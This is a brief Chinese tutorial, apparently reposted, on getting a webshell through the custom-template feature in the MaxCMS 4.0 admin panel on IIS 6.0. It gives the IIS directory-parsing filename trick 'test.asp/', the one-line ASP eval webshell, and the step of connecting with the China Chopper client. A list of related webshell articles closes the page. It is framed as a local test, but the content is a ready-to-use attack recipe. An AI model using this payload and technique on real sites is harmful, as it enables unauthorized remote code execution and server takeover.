利用后台模板获取webshell

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了利用后台模板获取webshell相关的知识,希望对你有一定的参考价值。

目标:win2003+iis6.0+maxcms 4.0(无公害,本地搭建测试)

进入后台找到模板页->管理自定义模板,如下图所示:
技术分享

添加模板,内容如下:
文件名填入:test.asp/

内容填入:<%eval request("test")%>

技术分享

在模板管理中找到模板的位置,如下图:

技术分享

使用菜刀连接即可:

技术分享

以上是关于利用后台模板获取webshell的主要内容,如果未能解决你的问题,请参考以下文章

OpenFire后台插件上传获取webshell及免密码登录linux服务器

PhpMyadmin利用Mysql root密码获取webshell

利用IISPUT漏洞上传木马,获取webshell

免考——webshell

MSSQL DBA权限获取WEBSHELL的过程

【网警提醒】基础网络攻防之webshell攻击